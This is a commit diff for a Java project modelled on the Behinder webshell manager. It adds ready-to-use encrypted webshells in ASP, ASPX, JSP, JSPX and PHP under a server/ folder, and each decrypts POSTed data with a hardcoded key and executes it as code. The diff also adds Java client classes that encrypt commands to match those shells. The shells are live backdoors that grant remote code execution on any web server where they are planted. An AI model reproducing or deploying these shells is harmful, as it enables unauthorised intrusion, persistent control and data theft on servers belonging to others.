tested some function

.gitignore

@@ -0,0 +1,11 @@
+
+# IntelliJ project files
+.idea
+*.iml
+out
+gen
+
+### Maven template
+target/
+.mvn/wrapper/maven-wrapper.jar
+

README.md

@@ -0,0 +1,12 @@
+
+# think in Behinder's code design
+
+thinks [@Behinder](https://github.com/rebeyond/Behinder),tested some code and function
+
+Gave me a lot of ideas,thanks again!
+
+![1-1.png](img/1-1.png)
+
+
+
+

pom.xml

@@ -0,0 +1,82 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>vip.youwe</groupId>
+    <artifactId>Behinder</artifactId>
+    <version>1.0</version>
+
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
+        <java.version>1.8</java.version>
+        <maven.compiler.source>1.8</maven.compiler.source>
+        <maven.compiler.target>1.8</maven.compiler.target>
+    </properties>
+
+    <dependencies>
+
+        <!-- https://mvnrepository.com/artifact/org.json/json -->
+        <dependency>
+            <groupId>org.json</groupId>
+            <artifactId>json</artifactId>
+            <version>20160810</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/javax.servlet/javax.servlet-api -->
+        <dependency>
+            <groupId>javax.servlet</groupId>
+            <artifactId>javax.servlet-api</artifactId>
+            <version>3.1.0</version>
+            <scope>provided</scope>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/javax.servlet.jsp/javax.servlet.jsp-api -->
+        <dependency>
+            <groupId>javax.servlet.jsp</groupId>
+            <artifactId>javax.servlet.jsp-api</artifactId>
+            <version>2.3.3</version>
+            <scope>provided</scope>
+        </dependency>
+
+
+        <!--        &lt;!&ndash; https://mvnrepository.com/artifact/org.apache.tomcat.embed/tomcat-embed-core &ndash;&gt;-->
+        <!--        <dependency>-->
+        <!--            <groupId>org.apache.tomcat.embed</groupId>-->
+        <!--            <artifactId>tomcat-embed-core</artifactId>-->
+        <!--            <version>8.5.55</version>-->
+        <!--        </dependency>-->
+
+        <!-- https://mvnrepository.com/artifact/org.xerial/sqlite-jdbc -->
+        <dependency>
+            <groupId>org.xerial</groupId>
+            <artifactId>sqlite-jdbc</artifactId>
+            <version>3.21.0</version>
+        </dependency>
+
+
+    </dependencies>
+
+
+    <build>
+        <resources>
+            <resource>
+                <directory>src/main/java</directory>
+                <includes>
+                    <include>**/*.properties</include>
+                    <include>**/*.fxml</include>
+                    <include>**/*.css</include>
+                </includes>
+            </resource>
+        </resources>
+
+
+    </build>
+
+
+
+
+</project>

server/shell.asp

@@ -0,0 +1,11 @@
+<%
+Response.CharSet = "UTF-8" 
+k="e45e329feb5d925b"
+Session("k")=k
+size=Request.TotalBytes
+content=Request.BinaryRead(size)
+For i=1 To size
+result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
+Next
+execute(result)
+%>

server/shell.aspx

@@ -0,0 +1 @@
+<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>

server/shell.jsp

@@ -0,0 +1 @@
+AAAAA<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>bbbb

server/shell.jspx.jsp

@@ -0,0 +1 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>

server/shell.php

@@ -0,0 +1,29 @@
+<?php
+@error_reporting(0);
+session_start();
+
+if ($_SERVER['REQUEST_METHOD'] === 'POST')
+{
+    $key="e45e329feb5d925b";
+	$_SESSION['k']=$key;
+	$post=file_get_contents("php://input");
+	if(!extension_loaded('openssl'))
+	{
+		$t="base64_"."decode";
+		$post=$t($post."");
+
+		for($i=0;$i<strlen($post);$i++) {
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
+	}
+	else
+	{
+		$post=openssl_decrypt($post, "AES128", $key);
+	}
+    $arr=explode('|',$post);
+    $func=$arr[0];
+    $params=$arr[1];
+	class C{public function __invoke($p) {eval($p."");}}
+    @call_user_func(new C(),$params);
+}
+?>

src/main/java/vip/youwe/sheller/core/Constants.java

@@ -0,0 +1,55 @@
+package vip.youwe.sheller.core;
+
+public class Constants {
+    public static String[] userAgents = {
+            "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1"
+            , "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"
+            , "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+            , "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50"
+            , "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)"
+            , "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)"
+            , "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)"
+            , "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
+            , "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+            , "Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12"
+            , "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)"
+            , "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)"
+            , "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)"
+            , "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201"
+            , "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201"
+            , "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"};
+
+
+    public static String VERSION = "v3.0 Beta 2 ";
+    public static int MENU_CUT = 1;
+    public static int MENU_COPY = 16;
+    public static int MENU_PASTE = 256;
+    public static int MENU_CLEAR = 4096;
+    public static int MENU_SELECT_ALL = 65536;
+    public static int MENU_ALL = 69905;
+
+    public static int ENCRYPT_TYPE_AES = 0;
+    public static int ENCRYPT_TYPE_XOR = 1;
+
+    public static int REALCMD_RUNNING = 0;
+    public static int REALCMD_STOPPED = 1;
+
+    public static int PROXY_ENABLE = 0;
+    public static int PROXY_DISABLE = 1;
+
+    public static int COLUMN_DATA_TYPE_INT = 0;
+    public static int COLUMN_DATA_TYPE_STRING = 1;
+
+    public static int FILE_TYPE_DIRECTORY = 0;
+    public static int FILE_TYPE_FILE = 1;
+
+    public static int SCRIPT_TYPE_ASP = 0;
+    public static int SCRIPT_TYPE_ASPX = 1;
+    public static int SCRIPT_TYPE_PHP = 2;
+    public static int SCRIPT_TYPE_JAVA = 3;
+
+    public static int PLUGIN_TYPE_SCAN = 0;
+    public static int PLUGIN_TYPE_EXPLOIT = 1;
+    public static int PLUGIN_TYPE_TOOL = 2;
+    public static int PLUGIN_TYPE_OTHER = 3;
+}

src/main/java/vip/youwe/sheller/core/Crypt.java

@@ -0,0 +1,111 @@
+package vip.youwe.sheller.core;
+
+
+import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.spec.SecretKeySpec;
+import java.nio.charset.StandardCharsets;
+
+public class Crypt {
+
+    public static byte[] Encrypt(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
+        cipher.init(1, skeySpec);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] Decrypt(byte[] bs, String key, int encryptType, String type) throws Exception {
+        byte[] result = null;
+        if (type.equals("jsp")) {
+            result = DecryptForJava(bs, key);
+        } else if (type.equals("php")) {
+            result = DecryptForPhp(bs, key, encryptType);
+        } else if (type.equals("aspx")) {
+            result = DecryptForCSharp(bs, key);
+        } else if (type.equals("asp")) {
+            result = DecryptForAsp(bs, key);
+        }
+        return result;
+    }
+
+
+    public static byte[] DecryptForJava(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
+        cipher.init(2, skeySpec);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        IvParameterSpec iv = new IvParameterSpec(raw);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+        cipher.init(1, skeySpec, iv);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] DecryptForCSharp(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes("utf-8");
+        IvParameterSpec iv = new IvParameterSpec(raw);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+        cipher.init(2, skeySpec, iv);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] EncryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
+        byte[] encrypted = null;
+        if (encryptType == Constants.ENCRYPT_TYPE_AES) {
+            byte[] raw = key.getBytes("utf-8");
+            SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+            cipher.init(1, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
+
+            encrypted = cipher.doFinal(bs);
+        } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
+            encrypted = DecryptForAsp(bs, key);
+        }
+        return encrypted;
+    }
+
+    public static byte[] EncryptForAsp(byte[] bs, String key) throws Exception {
+        for (int i = 0; i < bs.length; i++) {
+            bs[i] = (byte) (bs[i] ^ key.getBytes()[i + 1 & 0xF]);
+        }
+        return bs;
+    }
+
+
+    public static byte[] DecryptForPhp(byte[] bs, String key, int encryptType) throws Exception {
+        byte[] decrypted = null;
+        if (encryptType == Constants.ENCRYPT_TYPE_AES) {
+            byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+            bs = Base64.decode(new String(bs));
+            SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+            cipher.init(2, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
+
+            decrypted = cipher.doFinal(bs);
+        } else if (encryptType == Constants.ENCRYPT_TYPE_XOR) {
+            decrypted = DecryptForAsp(bs, key);
+        }
+        return decrypted;
+    }
+
+    public static byte[] DecryptForAsp(byte[] bs, String key) throws Exception {
+        for (int i = 0; i < bs.length; i++) {
+            bs[i] = (byte) (bs[i] ^ key.getBytes()[i + 1 & 0xF]);
+        }
+        return bs;
+    }
+}

src/main/java/vip/youwe/sheller/core/Decrypt.java

@@ -0,0 +1,49 @@
+package vip.youwe.sheller.core;
+
+import javax.crypto.Cipher;
+import javax.crypto.spec.IvParameterSpec;
+import javax.crypto.spec.SecretKeySpec;
+import java.nio.charset.StandardCharsets;
+
+public class Decrypt {
+
+    public static byte[] Encrypt(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/ECB/PKCS5Padding");
+        cipher.init(1, skeySpec);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] EncryptForCSharp(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        IvParameterSpec iv = new IvParameterSpec(raw);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+        cipher.init(1, skeySpec, iv);
+        return cipher.doFinal(bs);
+    }
+
+
+    public static byte[] EncryptForPhp(byte[] bs, String key) throws Exception {
+        byte[] raw = key.getBytes(StandardCharsets.UTF_8);
+        SecretKeySpec skeySpec = new SecretKeySpec(raw, "AES");
+        Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
+        cipher.init(1, skeySpec, new IvParameterSpec(new byte[]{0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}));
+        return cipher.doFinal(bs);
+    }
+
+    public static byte[] EncryptForAsp(byte[] bs, String key) throws Exception {
+        for (int i = 0; i < bs.length; i++) {
+            bs[i] = (byte) (bs[i] ^ key.getBytes()[i + 1 & 0xF]);
+        }
+        return bs;
+    }
+
+
+    public static void main(String[] args) throws Exception {
+        String res = new String(EncryptForAsp("ffff".getBytes(), "1234567887654321"));
+        System.out.println(res);
+    }
+}